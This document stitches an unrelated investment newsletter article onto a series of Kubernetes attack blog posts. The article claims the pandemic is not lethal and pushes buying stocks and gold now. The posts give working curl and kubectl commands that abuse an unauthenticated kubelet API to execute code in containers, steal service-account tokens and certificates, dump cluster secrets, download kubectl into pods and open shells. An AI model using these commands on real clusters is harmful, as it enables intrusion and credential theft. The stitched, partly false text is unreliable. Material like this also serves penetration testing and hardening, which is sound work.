
PANDEMIC PANIC: 2nd Wave Climax – FED CRIPPLED!

This article was contributed by Lior Gantz of the Wealth Research Group. 

What NO ONE expects is a deep recession; there are a number of CONFLICTING THEORIES as to what the recovery will look like, but none of them involve sliding back into recession. The consensus is that the pandemic is highly contagious, but not lethal; “with a vaccine coming and FEAR LEVELS subsiding, a recovery has begun” is the general idea.

Where OPINIONS DIFFER is on the strength and inclusiveness of the recovery:

  1. Dichotomy – This is the thesis that claims BIG BUSINESS is eating up SMALL BUSINESS, so the recovery is HAPPENING, but it isn’t a healthy one. We’ll see GDP printing better stats with each PASSING QUARTER, but poverty is increasing, since BIG gets BIGGER and small gets TINY.
  2. Vaccine-Dependent – This camp believes that the PENT-UP DEMAND will be unleashed, once first-responders agree to take the vaccine. That stamp of approval will LEAD to CONFIDENCE worldwide; I want to show you how much DISTRUST THERE IS in the value stocks, which are companies that dominate their industries but are growing slowly and predictably, not fast and sporadically.

The market believes that each company that isn’t on the cloud is going out of business, which has led to a bubble:

Courtesy: Zerohedge.com

You should consider THE FACTS about the pandemic before I move on to the THIRD CAMP: the investors who believe in the “V”-shaped or quick “U”-shaped recovery. They’re BUYING DIPS, as I am right now, following our FOUR WATCH LISTS: 1, 2, 3, and TECH.

The MOST IMPORTANT fact is that the PANDEMIC ITSELF isn’t lethal; the real crisis is overwhelmed hospitals and insufficient medical staff.

While no one likes to see CROWDED HEALTH FACILITIES, if those do return, the panic would be nowhere near the levels of March, when healthy people feared FOR THEIR LIVES.

Therefore, to expect markets to price in MARCH LOWS is a bit of a stretch.

Instead, be agile in your thinking; there are REAL BARGAINS out there. Flexibility is needed, though. Don’t wait for sellers to hand you once-in-a-generation prices for the second time in six months.

Courtesy: Zerohedge.com

As you can see, tight presidential races WEIGH ON PRICES, since the outcome is a huge unknown, especially when the parties are THIS POLARIZED on policy and public ideas.

It’s a tale of two Americas with two opposite agendas.

Where does gold come into the picture?

  3. Slow “V” or Fast “U” – Those who are FREE-MARKET oriented understand that businesses have muscled through the ROUGH PATCH and that capitalistic forces are driving innovation in this post-COVID-19 reality.

Wall Street and institutional money will be ENTERING EQUITIES on this severe dip, and you ought to know that BUYING NOW is playing with fire, but I certainly am.

Gold stocks have also reached their MOMENT OF TRUTH:

Courtesy: U.S. Global Investors

They MUST PENETRATE below the average of 2.5; that will signal a MULTI-YEAR TREND, which will confirm the bull market. The fact that Kinross and Newmont, among other large-cap miners, are RAISING DIVIDENDS is a healthy sign of confidence from the most reputable management teams out there.

The September dip has allowed us to find companies with GREAT SUPPORT and I’m going to present new stock profiles, since, as the chart above shows, we’re ON THE CUSP of the REAL MOVE.

Gold might sell off even further in this panic, but that’s not the REAL TREND; think ahead by 6-12 months and you’ll realize that inflation is accelerating!



Kubernetes: unauth kubelet API 10250 basic code exec

Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port, but it’s still possible to expose it inadvertently, and it’s still pretty common to find it exposed via the “insecure API service” option.

Anyone who has access to the kubelet service port (10250), even without a certificate, can execute arbitrary commands inside a container. The run endpoint takes the form:
# /run/%namespace%/%pod_name%/%container_name%
example:
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"

total 12
drwxr-xr-x   13 root     root           148 Aug 26 11:31 .
drwxr-xr-x   13 root     root           148 Aug 26 11:31 ..
-rwxr-xr-x    1 root     root             0 Aug 26 11:31 .dockerenv
drwxr-xr-x    2 root     root          8192 May  5 22:22 bin
drwxr-xr-x    5 root     root           380 Aug 26 11:31 dev
drwxr-xr-x    3 root     root           135 Aug 26 11:31 etc
drwxr-xr-x    2 nobody   nogroup          6 Mar 18 16:38 home
drwxr-xr-x    2 root     root             6 Apr 23 11:17 lib
dr-xr-xr-x  353 root     root             0 Aug 26 07:14 proc
drwxr-xr-x    2 root     root             6 Mar 18 16:38 root
dr-xr-xr-x   13 root     root             0 Aug 26 15:12 sys
drwxrwxrwt    2 root     root             6 Mar 18 16:38 tmp
drwxr-xr-x    4 root     root            31 Apr 23 11:17 usr
drwxr-xr-x    5 root     root            41 Aug 26 11:31 var
Here is how to get all the secrets a container uses via its environment variables (it’s common to see kubelet tokens here):
$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/%pod_name%/%container_name%" -d "cmd=env"
The list of all pods and containers that were scheduled on the Kubernetes worker node can be retrieved using one of the commands below:
$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool
or
$ curl --insecure https://k8s-node-1:10250/runningpods | jq
Example 1:
curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)
Example 2:
curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
Unauthorized
Example 3:
curl --insecure https://1.2.3.4:10250/runningpods | jq
Output:
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "kube-dns-5b8bf6c4f4-k5n2g",
        "generateName": "kube-dns-5b8bf6c4f4-",
        "namespace": "kube-system",
        "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",
        "uid": "63438841-e43c-11e8-a104-42010a80038e",
        "resourceVersion": "85366060",
        "creationTimestamp": "2018-11-09T16:27:44Z",
        "labels": {
          "k8s-app": "kube-dns",
          "pod-template-hash": "1646927090"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",
          "kubernetes.io/config.source": "api",
          "scheduler.alpha.kubernetes.io/critical-pod": ""
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "kube-dns-5b8bf6c4f4",
            "uid": "633db9d4-e43c-11e8-a104-42010a80038e",
            "controller": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "kube-dns-config",
            "configMap": {
              "name": "kube-dns",
              "defaultMode": 420
            }
          },
          {
            "name": "kube-dns-token-xznw5",
            "secret": {
              "secretName": "kube-dns-token-xznw5",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "dnsmasq",
            "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",
            "args": [
              "-v=2",
              "-logtostderr",
              "-configDir=/etc/k8s/dns/dnsmasq-nanny",
              "-restartDnsmasq=true",
              "--",
              "-k",
              "--cache-size=1000",
              "--no-negcache",
              "--log-facility=-",
              "--server=/cluster.local/127.0.0.1#10053",
              "--server=/in-addr.arpa/127.0.0.1#10053",
              "--server=/ip6.arpa/127.0.0.1#10053"
            ],
            "ports": [
              {
                "name": "dns",
                "containerPort": 53,
                "protocol": "UDP"
              },
              {
                "name": "dns-tcp",
                "containerPort": 53,
                "protocol": "TCP"
              }
            ],
            "resources": {
              "requests": {
                "cpu": "150m",
                "memory": "20Mi"
              }
            },
            "volumeMounts": [
              {
                "name": "kube-dns-config",
                "mountPath": "/etc/k8s/dns/dnsmasq-nanny"
              },
              {
                "name": "kube-dns-token-xznw5",
                "readOnly": true,
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"
              }
            ],
            "livenessProbe": {
              "httpGet": {
                "path": "/healthcheck/dnsmasq",
                "port": 10054,
                "scheme": "HTTP"
              },
              "initialDelaySeconds": 60,
              "timeoutSeconds": 5,
              "periodSeconds": 10,
              "successThreshold": 1,
              "failureThreshold": 5
            },
            "terminationMessagePath": "/dev/termination-log",
            "imagePullPolicy": "IfNotPresent"
          },
        --------SNIP---------
With the output of the runningpods command you can craft your command to do the code exec:
$ curl -k -XPOST "https://k8s-node-1:10250/run/%namespace%/%pod_name%/%container_name%" -d "cmd=env"

as an example, plugging in the kube-dns pod from the output above leaves you with:

curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  125 root     root             0 Nov  9 16:27 proc
drwx——    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Nov  9 16:27 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var
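If the node is running a lot of pods, you don’t have to eyeball the runningpods JSON. A small sketch (assuming jq is installed, and reusing the example k8s-node-1 host) that prints every namespace/pod/container triple the run endpoint accepts:

$ curl -sk https://k8s-node-1:10250/runningpods/ | jq -r '.items[] | . as $pod | .spec.containers[] | "\($pod.metadata.namespace)/\($pod.metadata.name)/\(.name)"'

Each output line slots directly onto the end of https://k8s-node-1:10250/run/ to build the exec request.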

Kubernetes: unauth kubelet API 10250 token theft & kubectl

Kubernetes: unauthenticated kubelet API (10250) token theft & kubectl access & exec

kube-hunter output to get us started:

Do a curl -sk https://k8-node:10250/runningpods/ to get a list of running pods.

With that data, you can craft your POST request to exec within a pod and poke around.

Example request:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"

Output:
total 35264
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 .
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 ..
-rwxr-xr-x    1 root     root             0 Nov  9 16:27 .dockerenv
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 bin
drwxr-xr-x    5 root     root           380 Nov  9 16:27 dev
-rwxr-xr-x    1 root     root      36047205 Apr 13  2018 dnsmasq-nanny
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 etc
drwxr-xr-x    2 root     root          4096 Jan  9  2018 home
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 lib
drwxr-xr-x    5 root     root          4096 Nov  9 16:27 media
drwxr-xr-x    2 root     root          4096 Jan  9  2018 mnt
dr-xr-xr-x  134 root     root             0 Nov  9 16:27 proc
drwx——    2 root     root          4096 Jan  9  2018 root
drwxr-xr-x    2 root     root          4096 Jan  9  2018 run
drwxr-xr-x    2 root     root          4096 Nov  9 16:27 sbin
drwxr-xr-x    2 root     root          4096 Jan  9  2018 srv
dr-xr-xr-x   12 root     root             0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root          4096 Nov  9 17:00 tmp
drwxr-xr-x    7 root     root          4096 Nov  9 16:27 usr
drwxr-xr-x    1 root     root          4096 Nov  9 16:27 var

Check the env and see if the kubelet tokens are in the environment variables. Depending on the cloud or hosting provider, they are sometimes right there. Otherwise we need to retrieve them from:
1. the mounted folder
2. the cloud metadata url

Check the env with the following command:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"

We are looking for the KUBELET_CERT, KUBELET_KEY, & CA_CERT environment variables.

We are also looking for the Kubernetes API server. This is most likely NOT the host you are messing with on 10250. We are looking for something like:
KUBERNETES_PORT=tcp://10.10.10.10:443
or
KUBERNETES_MASTER_NAME: 10.11.12.13:443
Once we get the Kubernetes tokens or keys, we need to talk to the API server to use them; the kubelet (10250) won’t know what to do with them. The API server may be (if we are lucky) another public IP, or a 10.x.x.x internal IP. If it’s a 10.x address, we need to download kubectl into the pod.
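As a sketch of that last case (assuming the container ships with wget and has outbound egress; the host, pod, and kubectl version here are just this post’s examples), you could pull a static kubectl into the pod through the same run endpoint:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=wget https://storage.googleapis.com/kubernetes-release/release/v1.13.0/bin/linux/amd64/kubectl -O /tmp/kubectl"
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=chmod +x /tmp/kubectl"

From there you run /tmp/kubectl inside the pod against the internal API server address.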
Assuming they’re not in the environment variables, let’s look and see if they are in the mounted secrets:
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=mount"

sample output truncated:
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)
tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)

We can then cat out the ca.crt, namespace, and token:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"

Output:

total 4
drwxrwxrwt    3 root     root         140 Nov  9 16:27 .
drwxr-xr-x    3 root     root        4.0K Nov  9 16:27 ..
lrwxrwxrwx    1 root     root          13 Nov  9 16:27 ca.crt -> ..data/ca.crt
lrwxrwxrwx    1 root     root          16 Nov  9 16:27 namespace -> ..data/namespace
lrwxrwxrwx    1 root     root          12 Nov  9 16:27 token -> ..data/token

and then:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

output:

eyJhbGciOiJSUzI1NiI—SNIP—

Also grab the ca.crt 🙂
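It’s the same pattern as the token grab, just pointed at the cert file; save the output locally as ca.crt for the kubectl commands below:

curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt"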

With the token, ca.crt and api server IP address we can issue commands with kubectl.

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI—SNIP— get pods --all-namespaces

Output:

NAMESPACE     NAME                                                            READY     STATUS    RESTARTS   AGE
kube-system   event-exporter-v0.1.9-5c-SNIP                          2/2       Running   2          120d
kube-system   fluentd-cloud-logging-gke-eeme-api-default-pool   1/1       Running   1          2y
kube-system   heapster-v1.5.2-5-SNIP                              3/3       Running   0          27d
kube-system   kube-dns-5b8-SNIP                                       4/4       Running   0          61d
kube-system   kube-dns-autoscaler-2-SNIP                             1/1       Running   1          252d
kube-system   kube-proxy-gke-eeme-api-default-pool              1/1       Running   1          2y 
kube-system   kubernetes-dashboard-7-SNIP                           1/1       Running   0          27d
kube-system   l7-default-backend-10-SNIP                            1/1       Running   0          27d
kube-system   metrics-server-v0.2.1-7-SNIP                         2/2       Running   0          120d

At this point you can pull secrets or exec into any available pods:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI—SNIP— get secrets --all-namespaces

To get a shell via kubectl:

$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI—SNIP— get pods --namespace=kube-system

NAME                                                            READY     STATUS    RESTARTS   AGE
event-exporter-v0.1.9-5-SNIP               2/2       Running   2          120d
–SNIP–
metrics-server-v0.2.1-7f8ee58c8f-ab13f     2/2       Running   0          120d

$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI—SNIP— /bin/sh

/ # ls -lah
total 40220
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 .
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 ..
-rwxr-xr-x    1 root     root           0 Sep 11 07:25 .dockerenv
drwxr-xr-x    3 root     root        4.0K Sep 11 07:25 apiserver.local.config
drwxr-xr-x    2 root     root       12.0K Sep 11 07:24 bin
drwxr-xr-x    5 root     root         380 Sep 11 07:25 dev
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 etc
drwxr-xr-x    2 nobody   nogroup     4.0K Nov  1  2017 home
-rwxr-xr-x    2 root     root       39.2M Dec 20  2017 metrics-server
dr-xr-xr-x  135 root     root           0 Sep 11 07:25 proc
drwxr-xr-x    1 root     root        4.0K Dec 19 21:33 root
dr-xr-xr-x   12 root     root           0 Dec 19 19:06 sys
drwxrwxrwt    1 root     root        4.0K Oct 18 13:57 tmp
drwxr-xr-x    3 root     root        4.0K Sep 11 07:24 usr
drwxr-xr-x    1 root     root        4.0K Sep 11 07:25 var

For completeness, if you got the keys via the environment variables, the kubectl command would be something like this:

kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces



Kubernetes: Kube-Hunter 10255

Below is some sample output, mainly here to show what an open 10255 will give you and what it looks like. Probably of most interest are the /pods endpoint, the /metrics endpoint, and the /stats endpoint.
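If you want to poke at those endpoints directly, the read-only port is plain HTTP and unauthenticated, so a few quick curls (placeholder host) will do:

$ curl -s http://1.2.3.4:10255/pods | jq
$ curl -s http://1.2.3.4:10255/metrics
$ curl -s http://1.2.3.4:10255/stats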



$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services…
|
| Etcd:
|   type: open service
|   service: Etcd
|_  host: 1.2.3.4:2379
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:443
|
| API Server:
|   type: open service
|   service: API Server
|_  host: 1.2.3.4:6443
|
| Etcd Remote version disclosure:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
|
| Kubelet API (readonly):
|   type: open service
|   service: Kubelet API (readonly)
|_  host: 1.2.3.4:10255
|
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host: 1.2.3.4:2379
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.
|
| K8s Version Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     The kubernetes version could be obtained
|_    from logs in the /metrics endpoint
|
| Privileged Container:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     A Privileged container exist on a node.
|     could expose the node/cluster to unwanted root
|_    operations
|
| Cluster Health Disclosure:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     By accessing the open /healthz handler, an
|     attacker could get the cluster health state without
|_    authenticating
|
| Exposed Pods:
|   type: vulnerability
|   host: 1.2.3.4:10255
|   description:
|     An attacker could view sensitive information
|     about pods that are bound to a Node using
|_    the /pods endpoint

———-

Nodes
+-------------+------------+
| TYPE        | LOCATION   |
+-------------+------------+
| Node/Master | 1.2.3.4    |
+-------------+------------+

Detected Services
+----------------------+---------------------+----------------------+
| SERVICE              | LOCATION            | DESCRIPTION          |
+----------------------+---------------------+----------------------+
| Kubelet API          | 1.2.3.4:10255       | The read-only port   |
| (readonly)           |                     | on the kubelet       |
|                      |                     | serves health        |
|                      |                     | probing endpoints,   |
|                      |                     | and is relied upon   |
|                      |                     | by many kubernetes   |
|                      |                     | componenets          |
+----------------------+---------------------+----------------------+
| Etcd                 | 1.2.3.4:2379        | Etcd is a DB that    |
|                      |                     | stores cluster's     |
|                      |                     | data, it contains    |
|                      |                     | configuration and    |
|                      |                     | current state        |
|                      |                     | information, and     |
|                      |                     | might contain        |
|                      |                     | secrets              |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:6443        | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+
| API Server           | 1.2.3.4:443         | The API server is in |
|                      |                     | charge of all        |
|                      |                     | operations on the    |
|                      |                     | cluster.             |
+----------------------+---------------------+----------------------+

Vulnerabilities
+---------------------+----------------------+----------------------+----------------------+----------------------+
| LOCATION            | CATEGORY             | VULNERABILITY        | DESCRIPTION          | EVIDENCE             |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Unauthenticated      | Etcd is accessible   | Etcd is accessible   | {"etcdserver":"2.3.8 |
|                     | Access               | using insecure       | using HTTP (without  | ","etcdcluster":"2.3 |
|                     |                      | connection (HTTP)    | authorization and    | ...                  |
|                     |                      |                      | authentication), it  |                      |
|                     |                      |                      | would allow a        |                      |
|                     |                      |                      | potential attacker   |                      |
|                     |                      |                      | to                   |                      |
|                     |                      |                      |      gain access to  |                      |
|                     |                      |                      | the etcd             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Information          | Etcd Remote version  | Remote version       | {"etcdserver":"2.3.8 |
|                     | Disclosure           | disclosure           | disclosure might     | ","etcdcluster":"2.3 |
|                     |                      |                      | give an attacker a   | ...                  |
|                     |                      |                      | valuable data to     |                      |
|                     |                      |                      | attack a cluster     |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | K8s Version          | The kubernetes       | v1.5.6-rc17          |
|                     | Disclosure           | Disclosure           | version could be     |                      |
|                     |                      |                      | obtained from logs   |                      |
|                     |                      |                      | in the /metrics      |                      |
|                     |                      |                      | endpoint             |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Exposed Pods         | An attacker could    | count: 68            |
|                     | Disclosure           |                      | view sensitive       |                      |
|                     |                      |                      | information about    |                      |
|                     |                      |                      | pods that are bound  |                      |
|                     |                      |                      | to a Node using the  |                      |
|                     |                      |                      | /pods endpoint       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Information          | Cluster Health       | By accessing the     | status: ok           |
|                     | Disclosure           | Disclosure           | open /healthz        |                      |
|                     |                      |                      | handler, an attacker |                      |
|                     |                      |                      | could get the        |                      |
|                     |                      |                      | cluster health state |                      |
|                     |                      |                      | without              |                      |
|                     |                      |                      | authenticating       |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:2379        | Access Risk          | Etcd Remote Read     | Remote read access   | {"action":"get","nod |
|                     |                      | Access Event         | might expose to an   | e":{"dir":true,"node |
|                     |                      |                      | attacker cluster's   | ...                  |
|                     |                      |                      | possible exploits,   |                      |
|                     |                      |                      | secrets and more.    |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+
| 1.2.3.4:10255       | Access Risk          | Privileged Container | A Privileged         | pod: node-exporter-  |
|                     |                      |                      | container exist on a | 1fmd9-z9685,         |
|                     |                      |                      | node. could expose   | containe...          |
|                     |                      |                      | the node/cluster to  |                      |
|                     |                      |                      | unwanted root        |                      |
|                     |                      |                      | operations           |                      |
+---------------------+----------------------+----------------------+----------------------+----------------------+


Kubernetes: List of ports

Other Kubernetes ports

What are some of the visible ports used in Kubernetes? (A quick nmap sweep covering all of them follows the list.)


  • 44134/tcp – Helm Tiller, weave, calico
  • 10250/tcp – kubelet (kubelet exploit)
    • No authN, completely open
    • /pods
    • /runningpods
    • /containerLogs
  • 10255/tcp – kubelet port (read-only)
    • /stats
    • /metrics
    • /pods
  • 4194/tcp – cAdvisor
  • 2379/tcp – etcd (see it on other ports though)
    • Etcd holds all the configs
    • Config storage
  • 30000 – dashboard
  • 443/6443 – api
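A one-shot sketch to sweep a target for everything above (placeholder IP):

$ nmap -sT -p 443,2379,4194,6443,10250,10255,30000,44134 1.2.3.4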

Kubernetes: Kubelet API containerLogs endpoint

How to get the info that kube-hunter reports for an open /containerLogs endpoint.



Vulnerabilities
+---------------+-------------+-------------------+----------------------+----------+
| LOCATION      | CATEGORY    | VULNERABILITY     | DESCRIPTION          | EVIDENCE |
+---------------+-------------+-------------------+----------------------+----------+
| 1.2.3.4:10250 | Information | Exposed Container | Output logs from a   |          |
|               | Disclosure  | Logs              | running container    |          |
|               |             |                   | are using the        |          |
|               |             |                   | exposed              |          |
|               |             |                   | /containerLogs       |          |
|               |             |                   | endpoint             |          |
+---------------+-------------+-------------------+----------------------+----------+

First step, grab the output from /runningpods/ (see the examples in the posts above). You’ll need the namespace, pod name, and container name.

Thus, given the below runningpods output:

{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]},


turns into:

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana

and

https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
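To generate those containerLogs URLs for every container on the node in one pass, a jq one-liner like this works (a sketch, assuming jq and the same placeholder host):

$ curl -sk https://1.2.3.4:10250/runningpods/ | jq -r '.items[] | . as $p | .spec.containers[] | "https://1.2.3.4:10250/containerLogs/\($p.metadata.namespace)/\($p.metadata.name)/\(.name)"'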




Kubernetes: Kubernetes Dashboard

Tesla was famously hacked for leaving this open, and it’s pretty rare to find it exposed externally now, but it’s useful to know what it is and what you can do with it.

Usually found on port 30000

kube-hunter finding for it:

Vulnerabilities
+---------------+-------------+-------------------+----------------------+------------------+
| LOCATION      | CATEGORY    | VULNERABILITY     | DESCRIPTION          | EVIDENCE         |
+---------------+-------------+-------------------+----------------------+------------------+
| 1.2.3.4:30000 | Remote Code | Dashboard Exposed | All operations on    | nodes: pach-okta |
|               | Execution   |                   | the cluster are      |                  |
|               |             |                   | exposed              |                  |
+---------------+-------------+-------------------+----------------------+------------------+

Why do you care? It has access to all pods and secrets within the cluster, so rather than using command-line tools to get secrets or run code, you can just do it in a web browser.

Screenshots in the original post show what it looks like: viewing secrets, utilization, logs, and shells.


Kubernetes: Master Post

I have a few Kubernetes posts queued up and will make this the master post to index and give references for the topic. If I’m missing blog posts or useful resources, ping me here or on twitter.

Talks you should watch if you are interested in Kubernetes:

Hacking and Hardening Kubernetes Clusters by Example [I] – Brad Geesaman

https://www.youtube.com/watch?v=vTgQLzeBfRU
https://github.com/bgeesaman/
https://github.com/bgeesaman/hhkbe [demos for the talk above]
https://schd.ws/hosted_files/kccncna17/d8/Hacking%20and%20Hardening%20Kubernetes%20By%20Example%20v2.pdf [slide deck]

Perfect Storm: Taking the Helm of Kubernetes – Ian Coldwater

https://www.youtube.com/watch?v=1k-GIDXgfLw

A Hacker’s Guide to Kubernetes and the Cloud – Rory McCune
https://www.youtube.com/watch?v=dxKpCO2dAy8
Shipping in Pirate-Infested Waters: Practical Attack and Defense in Kubernetes

https://www.youtube.com/watch?v=ohTq0no0ZVU

Blog posts by others:

https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://www.4armed.com/blog/hacking-digitalocean-kubernetes/
https://github.com/freach/kubernetes-security-best-practice
https://neuvector.com/container-security/kubernetes-security-guide/
https://medium.com/@pczarkowski/the-kubernetes-api-call-is-coming-from-inside-the-cluster-f1a115bd2066
https://blog.intothesymmetry.com/2018/12/persistent-xsrf-on-kubernetes-dashboard.html
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2017/04/02/Kubernetes-Service-Tokens/
https://www.cyberark.com/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions/
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Auditing tools

https://github.com/Shopify/kubeaudit
https://github.com/aquasecurity/kube-bench
https://github.com/aquasecurity/kube-hunter

CVE-2018-1002105 resources

https://blog.appsecco.com/analysing-and-exploiting-kubernetes-apiserver-vulnerability-cve-2018-1002105-3150d97b24bb
https://gravitational.com/blog/kubernetes-websocket-upgrade-security-vulnerability/
https://github.com/gravitational/cve-2018-1002105
https://github.com/evict/poc_CVE-2018-1002105

CG Posts:

